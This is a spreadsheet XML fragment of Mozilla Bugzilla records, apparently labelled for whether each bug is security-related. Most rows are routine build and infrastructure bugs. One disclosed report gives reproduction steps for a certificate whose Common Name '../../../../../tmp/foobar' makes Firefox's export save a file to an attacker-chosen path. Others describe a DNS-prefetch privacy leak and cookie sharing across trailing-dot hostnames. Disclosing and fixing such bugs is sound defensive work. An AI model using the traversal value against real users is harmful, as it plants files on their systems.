[task 2019-09-26T12:44:23.594Z] [3458/3798] /builds/worker/fetches/llvm-project/build/stage2/clang/bin/clang++  -DGTEST_HAS_RTTI=0 -D_GNU_SOURCE -D__STDC_CONSTANT_MACROS -D__STDC_FORMAT_MACROS -D__STDC_LIMIT_MACROS -Itools/llvm-diff -I/builds/worker/fetches/llvm-project/llvm/tools/llvm-diff -Iinclude -I/builds/worker/fetches/llvm-project/llvm/include -fPIC -Qunused-arguments -gcc-toolchain /builds/worker/fetches/llvm-project/build/stage1/clang -fPIC -fvisibility-inlines-hidden -Werror=date-time -Werror=unguarded-availability-new -std=c++11 -Wall -Wextra -Wno-unused-parameter -Wwrite-strings -Wcast-qual -Wmissing-field-initializers -pedantic -Wno-long-long -Wimplicit-fallthrough -Wcovered-switch-default -Wno-noexcept-type -Wnon-virtual-dtor -Wdelete-non-virtual-dtor -Wstring-conversion -fdiagnostics-color -ffunction-sections -fdata-sections -O3 -DNDEBUG    -fno-exceptions -fno-rtti -MD -MT tools/llvm-diff/CMakeFiles/llvm-diff.dir/DiffConsumer.cpp.o -MF tools/llvm-diff/CMakeFiles/llvm-diff.dir/DiffConsumer.cpp.o.d -o tools/llvm-diff/CMakeFiles/llvm-diff.dir/DiffConsumer.cpp.o -c /builds/worker/fetches/llvm-project/llvm/tools/llvm-diff/DiffConsumer.cpp
[taskcluster:error] Task timeout after 3600 seconds. Force killing container.
[taskcluster 2019-09-26 12:44:24.314Z] === Task Finished ===
[taskcluster 2019-09-26 12:44:24.314Z] Unsuccessful task run with exit code: -1 completed in 3630.724 seconds</t>
        </is>
      </c>
      <c r="X4749" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4750">
      <c r="A4750" t="n">
        <v>200561</v>
      </c>
      <c r="B4750" t="inlineStr">
        <is>
          <t>2003-04-03 16:06:13 -0800</t>
        </is>
      </c>
      <c r="C4750" t="inlineStr">
        <is>
          <t>Cannot load NSS programs due to libnspr.so failure on AIX platform</t>
        </is>
      </c>
      <c r="D4750" t="inlineStr">
        <is>
          <t>2003-11-26 16:33:59 -0800</t>
        </is>
      </c>
      <c r="E4750" t="n">
        <v>1</v>
      </c>
      <c r="F4750" t="n">
        <v>1</v>
      </c>
      <c r="G4750" t="n">
        <v>3</v>
      </c>
      <c r="H4750" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4750" t="inlineStr">
        <is>
          <t>NSPR</t>
        </is>
      </c>
      <c r="J4750" t="inlineStr">
        <is>
          <t>NSPR</t>
        </is>
      </c>
      <c r="K4750" t="inlineStr">
        <is>
          <t>4.3</t>
        </is>
      </c>
      <c r="L4750" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="M4750" t="inlineStr">
        <is>
          <t>AIX</t>
        </is>
      </c>
      <c r="N4750" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4750" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4750" t="inlineStr"/>
      <c r="Q4750" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4750" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4750" t="inlineStr">
        <is>
          <t>4.4</t>
        </is>
      </c>
      <c r="T4750" t="n">
        <v>1</v>
      </c>
      <c r="U4750" t="n">
        <v>0</v>
      </c>
      <c r="V4750" t="n">
        <v>8</v>
      </c>
      <c r="W4750" t="inlineStr">
        <is>
          <t>While running Backward Compatibility NSS 3.8 tests (against BC binaries of NSS
3.7) on AIX, failures to load NSS cmds were seen for the OPT build.
Log files report a libnspr4.so failure and are attached.</t>
        </is>
      </c>
      <c r="X4750" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4751">
      <c r="A4751" t="n">
        <v>1182163</v>
      </c>
      <c r="B4751" t="inlineStr">
        <is>
          <t>2015-07-09 10:02:25 -0700</t>
        </is>
      </c>
      <c r="C4751" t="inlineStr">
        <is>
          <t>Set DATABASE_URL and DATABASE_URL_RO in puppet on stage/prod</t>
        </is>
      </c>
      <c r="D4751" t="inlineStr">
        <is>
          <t>2015-07-09 10:42:57 -0700</t>
        </is>
      </c>
      <c r="E4751" t="n">
        <v>1</v>
      </c>
      <c r="F4751" t="n">
        <v>1</v>
      </c>
      <c r="G4751" t="n">
        <v>7</v>
      </c>
      <c r="H4751" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I4751" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J4751" t="inlineStr">
        <is>
          <t>Treeherder: Infrastructure</t>
        </is>
      </c>
      <c r="K4751" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L4751" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4751" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4751" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4751" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4751" t="inlineStr"/>
      <c r="Q4751" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R4751" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4751" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4751" t="n">
        <v>1</v>
      </c>
      <c r="U4751" t="n">
        <v>0</v>
      </c>
      <c r="V4751" t="n">
        <v>3</v>
      </c>
      <c r="W4751" t="inlineStr">
        <is>
          <t>For bug 1175432 we're wanting to replace the separate TREEHERDER_DATABASE_{HOST,PORT,USERNAME,PASSWORD,NAME} variables with a single 12-factor app style DATABASE_URL.
As such, please could you add the following environment variables for stage:
DATABASE_URL="mysql://th_admin:TREEHERDER_DATABASE_PASSWORD@treeherder-stage-rw-vip.db.scl3.mozilla.com/treeherder_stage"
DATABASE_URL_RO="mysql://th_user:TREEHERDER_RO_DATABASE_PASSWORD@treeherder-stage-ro-vip.db.scl3.mozilla.com/treeherder_stage"
(Substituting in the current values for TREEHERDER_DATABASE_PASSWORD and TREEHERDER_RO_DATABASE_PASSWORD)
And for prod:
DATABASE_URL="mysql://th_admin:TREEHERDER_DATABASE_PASSWORD@treeherder-rw-vip.metrics.scl3.mozilla.com/treeherder"
DATABASE_URL_RO="mysql://th_user:TREEHERDER_RO_DATABASE_PASSWORD@treeherder-ro-vip.metrics.scl3.mozilla.com/treeherder"
(Also substituting the passwords)
At some point after bug 1175432 lands, I'll file another bug to remove the old variables from puppet.
Thanks :-)</t>
        </is>
      </c>
      <c r="X4751" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4752">
      <c r="A4752" t="n">
        <v>492196</v>
      </c>
      <c r="B4752" t="inlineStr">
        <is>
          <t>2009-05-09 08:35:59 -0700</t>
        </is>
      </c>
      <c r="C4752" t="inlineStr">
        <is>
          <t>Make DNS-Prefetching subject to user-defined policies</t>
        </is>
      </c>
      <c r="D4752" t="inlineStr">
        <is>
          <t>2012-03-29 02:15:31 -0700</t>
        </is>
      </c>
      <c r="E4752" t="n">
        <v>1</v>
      </c>
      <c r="F4752" t="n">
        <v>1</v>
      </c>
      <c r="G4752" t="n">
        <v>3</v>
      </c>
      <c r="H4752" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4752" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4752" t="inlineStr">
        <is>
          <t>Networking</t>
        </is>
      </c>
      <c r="K4752" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4752" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4752" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4752" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4752" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4752" t="inlineStr">
        <is>
          <t>[tb3needs]</t>
        </is>
      </c>
      <c r="Q4752" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4752" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S4752" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4752" t="n">
        <v>1</v>
      </c>
      <c r="U4752" t="n">
        <v>0</v>
      </c>
      <c r="V4752" t="n">
        <v>25</v>
      </c>
      <c r="W4752" t="inlineStr">
        <is>
          <t>Bug 453403 implemented DNS prefetching in Necko, which has severe security implications:
Local HTML pages will generate DNS queries even if other remote content is disabled, e.g. for mere &lt;a href="..."&gt;!
This gets even more creepy if we take into account that SeaMonkey and Thunderbird render _all_ messages (even plaintext ones) as HTML documents in a &lt;browser&gt; element. Thus reading a plaintext(!) message will already make you acknowledge the existence of this account (e.g. by using one-time subdomain entries), because even in plaintext mode links are rendered as clickable items. 
Until now, there was a commonly agreed assumption that reading local HTML without remote *content* will keep your privacy intact. This promise is broken now.
While you can turn off the prefetching entirely by using network.dns.disablePrefetch, this is no real option for SeaMonkey (although maybe for TB), because you can't seriously apply one single setting to public websurfing, viewing local HTML documents in the browser and reading mail all alike without affecting user experience.
We could even work around the mail case by trying to produce certain markup, but that is rather band-aiding than fixing the real issue. And, of course, this will not help a bit when viewing local HTML documents in the browser...</t>
        </is>
      </c>
      <c r="X4752" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4753">
      <c r="A4753" t="n">
        <v>121289</v>
      </c>
      <c r="B4753" t="inlineStr">
        <is>
          <t>2002-01-22 12:06:01 -0800</t>
        </is>
      </c>
      <c r="C4753" t="inlineStr">
        <is>
          <t>Javascript error in escrowWarn.js break certificate enrollment with key escrow.</t>
        </is>
      </c>
      <c r="D4753" t="inlineStr">
        <is>
          <t>2016-09-27 13:03:20 -0700</t>
        </is>
      </c>
      <c r="E4753" t="n">
        <v>1</v>
      </c>
      <c r="F4753" t="n">
        <v>1</v>
      </c>
      <c r="G4753" t="n">
        <v>6</v>
      </c>
      <c r="H4753" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I4753" t="inlineStr">
        <is>
          <t>Core Graveyard</t>
        </is>
      </c>
      <c r="J4753" t="inlineStr">
        <is>
          <t>Security: UI</t>
        </is>
      </c>
      <c r="K4753" t="inlineStr">
        <is>
          <t>1.0 Branch</t>
        </is>
      </c>
      <c r="L4753" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4753" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N4753" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4753" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4753" t="inlineStr"/>
      <c r="Q4753" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4753" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S4753" t="inlineStr">
        <is>
          <t>psm2.2</t>
        </is>
      </c>
      <c r="T4753" t="n">
        <v>1</v>
      </c>
      <c r="U4753" t="n">
        <v>0</v>
      </c>
      <c r="V4753" t="n">
        <v>17</v>
      </c>
      <c r="W4753" t="inlineStr">
        <is>
          <t>The Netscape site to get certificates needs to differentiate between various
browsers, including 6.X 4.X and IE.
Up until BuildID: 2002011403 (at least), the page (which has not changed)
doesn't generate javascript errors, but using Linux build ID 2002012208, the
page generates javascript errors that prevents users from obtaining certificates.
I haven't tried other platforms.
To reproduce:
open a javascript console
visit certificates.netscape.com
click on get the cert.
The resulting page generates errors, and the submit button doesn't work anymore.
There is an evangelism bug: bug 120317 that mentions documents.layers. However,
the page above worked until recently.  If Moz doesn't support documents.layers,
it should still behave the same way it did until recently (i.e., it doesn't
prevent the page from working).
The code in certificates.netscape.com reads:
function warn()	{
	if (navigator.appName == "Netscape" &amp;&amp; document.layers )	{
		// NSCP4
		document.wait.visibility="show";
	} else if (navigator.appName == "Netscape" &amp;&amp; document.getElementById) {
		// NSCP6
		// var theTopEle = document.getElementById('theTop');
		document.getElementById('wait').style.visibility="visible";
	} else {
		// IE 5 - same as NSCP 6 - but what the hell....
		document.getElementById('wait').style.visibility="visible";
	}
}</t>
        </is>
      </c>
      <c r="X4753" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4754">
      <c r="A4754" t="n">
        <v>1161520</v>
      </c>
      <c r="B4754" t="inlineStr">
        <is>
          <t>2015-05-05 04:46:52 -0700</t>
        </is>
      </c>
      <c r="C4754" t="inlineStr">
        <is>
          <t>Improve log output for builds-4hr ingestion warnings</t>
        </is>
      </c>
      <c r="D4754" t="inlineStr">
        <is>
          <t>2015-05-06 13:01:19 -0700</t>
        </is>
      </c>
      <c r="E4754" t="n">
        <v>1</v>
      </c>
      <c r="F4754" t="n">
        <v>1</v>
      </c>
      <c r="G4754" t="n">
        <v>7</v>
      </c>
      <c r="H4754" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I4754" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J4754" t="inlineStr">
        <is>
          <t>Treeherder: Data Ingestion</t>
        </is>
      </c>
      <c r="K4754" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L4754" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4754" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4754" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4754" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4754" t="inlineStr"/>
      <c r="Q4754" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R4754" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4754" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4754" t="n">
        <v>1</v>
      </c>
      <c r="U4754" t="n">
        <v>0</v>
      </c>
      <c r="V4754" t="n">
        <v>4</v>
      </c>
      <c r="W4754" t="inlineStr">
        <is>
          <t>For many of the current warnings, we don't specify the buildername which isn't overly helpful.
We also display a lot of "skipping job on unsupported branch idle" spew, when this is expected: we don't want to ingest the fuzzer jobs.</t>
        </is>
      </c>
      <c r="X4754" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4755">
      <c r="A4755" t="n">
        <v>1017616</v>
      </c>
      <c r="B4755" t="inlineStr">
        <is>
          <t>2014-05-29 07:30:03 -0700</t>
        </is>
      </c>
      <c r="C4755" t="inlineStr">
        <is>
          <t>"export" in Certificate Viewer can cause navigation to  arbitrary filesystem paths</t>
        </is>
      </c>
      <c r="D4755" t="inlineStr">
        <is>
          <t>2024-05-30 08:34:55 -0700</t>
        </is>
      </c>
      <c r="E4755" t="n">
        <v>1</v>
      </c>
      <c r="F4755" t="n">
        <v>1</v>
      </c>
      <c r="G4755" t="n">
        <v>3</v>
      </c>
      <c r="H4755" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4755" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4755" t="inlineStr">
        <is>
          <t>Security: PSM</t>
        </is>
      </c>
      <c r="K4755" t="inlineStr">
        <is>
          <t>31 Branch</t>
        </is>
      </c>
      <c r="L4755" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4755" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N4755" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4755" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4755" t="inlineStr">
        <is>
          <t>[psm-assigned][post-critsmash-triage][adv-main51+]</t>
        </is>
      </c>
      <c r="Q4755" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4755" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4755" t="inlineStr">
        <is>
          <t>mozilla52</t>
        </is>
      </c>
      <c r="T4755" t="n">
        <v>1</v>
      </c>
      <c r="U4755" t="n">
        <v>0</v>
      </c>
      <c r="V4755" t="n">
        <v>25</v>
      </c>
      <c r="W4755" t="inlineStr">
        <is>
          <t>Date: Thu, 29 May 2014 03:35:19 +0200
From: Jann Horn &lt;jann@thejh.net&gt;
To: security@mozilla.org
Subject: Clicking "export" in Certificate Viewer can cause navigation to
	arbitrary filesystem paths
-----//-----
Version tested: Firefox Nightly 31.0a1 on Debian Linux 7
VULNERABILITY DETAILS
On Linux, when a Certificate with slashes in the Common Name field is exported, this causes the file saving dialog to put the
whole CN, including slashes, into the filename field. If the user just hits the save button, this causes the file to be saved
in an attacker-chosen location on disk with an attacker-chosen filename, possibly leading to the file being interpreted as a
configuration file or similar.
REPRODUCTION CASE
Create a self-signed cert like this:
$ openssl req -x509 -nodes -days 365 -newkey rsa:2048 -keyout mysitename.key -out mysitename.crt
Generating a 2048 bit RSA private key
...............................+++
.....................................+++
writing new private key to 'mysitename.key'
-----
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
-----
Country Name (2 letter code) [AU]:
State or Province Name (full name) [Some-State]:
Locality Name (eg, city) []:
Organization Name (eg, company) [Internet Widgits Pty Ltd]:
Organizational Unit Name (eg, section) []:
Common Name (e.g. server FQDN or YOUR name) []:../../../../../tmp/foobar
Email Address []:
First navigate to some normal https website and save its cert. Then configure a webserver to use the new cert you just created and navigate to that server. On the cert warning page, open the certificate viewer and click "export". You should see a "save file" dialog showing you the directory in which you saved the last cert with a suggested filename "../../../../../tmp/foobar". Click "save". Now there should be a new certificate file /tmp/foobar in your local filesystem.
Note that there is a similar issue in Chromium, Issue 378512 - you might want to coordinate the fix with them?
(Also, testing for this issue in Firefox was not my idea - I found it in Chromium, wfh@chromium.org suggested to check Firefox for the same issue.)</t>
        </is>
      </c>
      <c r="X4755" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4756">
      <c r="A4756" t="n">
        <v>1011354</v>
      </c>
      <c r="B4756" t="inlineStr">
        <is>
          <t>2014-05-15 19:06:34 -0700</t>
        </is>
      </c>
      <c r="C4756" t="inlineStr">
        <is>
          <t>crash in mozilla::net::nsHttpChannel::OnStopRequest(nsIRequest*, nsISupports*, tag_nsresult)</t>
        </is>
      </c>
      <c r="D4756" t="inlineStr">
        <is>
          <t>2018-04-04 06:12:23 -0700</t>
        </is>
      </c>
      <c r="E4756" t="n">
        <v>1</v>
      </c>
      <c r="F4756" t="n">
        <v>1</v>
      </c>
      <c r="G4756" t="n">
        <v>3</v>
      </c>
      <c r="H4756" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4756" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4756" t="inlineStr">
        <is>
          <t>Networking</t>
        </is>
      </c>
      <c r="K4756" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4756" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4756" t="inlineStr">
        <is>
          <t>Windows NT</t>
        </is>
      </c>
      <c r="N4756" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4756" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4756" t="inlineStr">
        <is>
          <t>[adv-main33+][adv-esr31.2+][b2g-adv-main2.2+]</t>
        </is>
      </c>
      <c r="Q4756" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4756" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4756" t="inlineStr">
        <is>
          <t>mozilla35</t>
        </is>
      </c>
      <c r="T4756" t="n">
        <v>1</v>
      </c>
      <c r="U4756" t="n">
        <v>0</v>
      </c>
      <c r="V4756" t="n">
        <v>41</v>
      </c>
      <c r="W4756" t="inlineStr">
        <is>
          <t>This bug was filed from the Socorro interface and is 
report bp-57a3cfc1-a538-4c0b-baf8-d75182140515.
=============================================================
Note: automated exploitability analysis rated this high.</t>
        </is>
      </c>
      <c r="X4756" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4757">
      <c r="A4757" t="n">
        <v>98146</v>
      </c>
      <c r="B4757" t="inlineStr">
        <is>
          <t>2001-09-04 03:38:38 -0700</t>
        </is>
      </c>
      <c r="C4757" t="inlineStr">
        <is>
          <t>[security] Minor problem w/ error message if some sort of login error in doeditvotes</t>
        </is>
      </c>
      <c r="D4757" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:26 -0800</t>
        </is>
      </c>
      <c r="E4757" t="n">
        <v>1</v>
      </c>
      <c r="F4757" t="n">
        <v>1</v>
      </c>
      <c r="G4757" t="n">
        <v>4</v>
      </c>
      <c r="H4757" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I4757" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J4757" t="inlineStr">
        <is>
          <t>Creating/Changing Bugs</t>
        </is>
      </c>
      <c r="K4757" t="inlineStr">
        <is>
          <t>2.15</t>
        </is>
      </c>
      <c r="L4757" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4757" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4757" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4757" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4757" t="inlineStr">
        <is>
          <t>security: untrusted var in HTML | applied to 2.14.1</t>
        </is>
      </c>
      <c r="Q4757" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4757" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4757" t="inlineStr">
        <is>
          <t>Bugzilla 2.16</t>
        </is>
      </c>
      <c r="T4757" t="n">
        <v>1</v>
      </c>
      <c r="U4757" t="n">
        <v>0</v>
      </c>
      <c r="V4757" t="n">
        <v>16</v>
      </c>
      <c r="W4757" t="inlineStr">
        <is>
          <t>doeditvotes.cgi contains the following:
&gt; if ( (! defined $who) || (!$who) ) {
&gt; PutHeader("Bad login.");
&gt;
&gt; print "The login info got confused.  If you want to adjust the votes\n";
&gt; print "for &lt;tt&gt;$::COOKIE{'Bugzilla_login'}&lt;/tt&gt;, then please\n";
&gt; print "&lt;a href=showvotes.cgi?user=$who&gt;click here&lt;/a&gt;.&lt;hr&gt;\n";
&gt;
&gt; PutFooter();
&gt;
&gt; exit();
&gt;}
If something went mad, and $who was undefined, then this warning message would
try and use it in the showvotes.cgi link ( =&gt; http log warning + bad link generated)
Should the message just say 'please log in (again) and try again', or something
like that?</t>
        </is>
      </c>
      <c r="X4757" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4758">
      <c r="A4758" t="n">
        <v>616264</v>
      </c>
      <c r="B4758" t="inlineStr">
        <is>
          <t>2010-12-02 13:28:25 -0800</t>
        </is>
      </c>
      <c r="C4758" t="inlineStr">
        <is>
          <t>Cookies set for www.foo.com. are sent to www.foo.com</t>
        </is>
      </c>
      <c r="D4758" t="inlineStr">
        <is>
          <t>2020-10-07 10:56:03 -0700</t>
        </is>
      </c>
      <c r="E4758" t="n">
        <v>1</v>
      </c>
      <c r="F4758" t="n">
        <v>1</v>
      </c>
      <c r="G4758" t="n">
        <v>3</v>
      </c>
      <c r="H4758" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4758" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4758" t="inlineStr">
        <is>
          <t>Networking: Cookies</t>
        </is>
      </c>
      <c r="K4758" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4758" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4758" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N4758" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4758" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4758" t="inlineStr">
        <is>
          <t>[sg:moderate] (sg:high for affected sites)</t>
        </is>
      </c>
      <c r="Q4758" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4758" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4758" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4758" t="n">
        <v>1</v>
      </c>
      <c r="U4758" t="n">
        <v>0</v>
      </c>
      <c r="V4758" t="n">
        <v>53</v>
      </c>
      <c r="W4758" t="inlineStr">
        <is>
          <t>Created attachment 494804
step 1
Firefox considers the domains www.foo.com. (HOST1) to be the same as www.foo.com (HOST2) for cookie purposes. Note the trailing period in the first domain. Cookie values set by either HOST1/HOST2 can be retrieved by and sent to the other host. Tests showed that the hosts are considered different from crossdomain purposes. FF4b7, 3.6.11 and Safari 5.0.2 all exhibited the same behavior, while Chrome did not.
See attached screenshots for demonstration.
Steps used in screenshot
1. Visit www.tumblr.com. (controlled by me, sets a cookie)
2. Visit www.tumblr.com (note that the cookie I set is sent to tumblr.com)
The tumblr issue isn't resolved yet.
It seems to me that the Chrome way of handling hosts is more correct. However the specs may say otherwise. There may also be other areas of the code that exhibit similar behavior.
User Agents
FF4b7
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:2.0b7) Gecko/20100101 Firefox/4.0b7
FF3.6.11
Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.11) Gecko/20101013 Ubuntu/10.04 (lucid) Firefox/3.6.11
Safari 5.0.2
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_5; en-us) AppleWebKit/533.18.1 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5
Chrome 8.0.552.215
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_5; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10</t>
        </is>
      </c>
      <c r="X4758" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4759">
      <c r="A4759" t="n">
        <v>1476271</v>
      </c>
      <c r="B4759" t="inlineStr">
        <is>
          <t>2018-07-17 05:59:18 -0700</t>
        </is>
      </c>
      <c r="C4759" t="inlineStr">
        <is>
          <t>Perma Could not find com.google.android.gms:play-services-analytics:15.0.1.</t>
        </is>
      </c>
      <c r="D4759" t="inlineStr">
        <is>
          <t>2018-11-19 09:45:57 -0800</t>
        </is>
      </c>
      <c r="E4759" t="n">
        <v>1</v>
      </c>
      <c r="F4759" t="n">
        <v>1</v>
      </c>
      <c r="G4759" t="n">
        <v>7</v>
      </c>
      <c r="H4759" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I4759" t="inlineStr">
        <is>
          <t>Firefox Build System</t>
        </is>
      </c>
      <c r="J4759" t="inlineStr">
        <is>
          <t>Toolchains</t>
        </is>
      </c>
      <c r="K4759" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4759" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4759" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4759" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4759" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4759" t="inlineStr">
        <is>
          <t>--do_not_change--[priority:high]</t>
        </is>
      </c>
      <c r="Q4759" t="inlineStr">
        <is>
          <t>P5</t>
        </is>
      </c>
      <c r="R4759" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4759" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4759" t="n">
        <v>1</v>
      </c>
      <c r="U4759" t="n">
        <v>0</v>
      </c>
      <c r="V4759" t="n">
        <v>13</v>
      </c>
      <c r="W4759" t="inlineStr">
        <is>
          <t>Filed by: ebalazs [at] mozilla.com
https://treeherder.mozilla.org/logviewer.html#?job_id=188547329&amp;repo=try
https://queue.taskcluster.net/v1/task/SW9jXgTwTUmhUhJaFwiluQ/runs/0/artifacts/public/logs/live_backing.log
Could not find com.google.android.gms:play-services-analytics:15.0.1.
[task 2018-07-17T11:48:02.349Z]  0:51.76   Searched in the following locations:
[task 2018-07-17T11:48:02.349Z]  0:51.76       file:/builds/worker/workspace/build/src/android-sdk-linux/extras/m2repository/com/google/android/gms/play-services-analytics/15.0.1/play-services-analytics-15.0.1.pom
[task 2018-07-17T11:48:02.350Z]  0:51.76       file:/builds/worker/workspace/build/src/android-sdk-linux/extras/m2repository/com/google/android/gms/play-services-analytics/15.0.1/play-services-analytics-15.0.1.jar
[task 2018-07-17T11:48:02.350Z]  0:51.76       file:/builds/worker/workspace/build/src/android-sdk-linux/extras/google/m2repository/com/google/android/gms/play-services-analytics/15.0.1/play-services-analytics-15.0.1.pom
[task 2018-07-17T11:48:02.350Z]  0:51.76       file:/builds/worker/workspace/build/src/android-sdk-linux/extras/google/m2repository/com/google/android/gms/play-services-analytics/15.0.1/play-services-analytics-15.0.1.jar
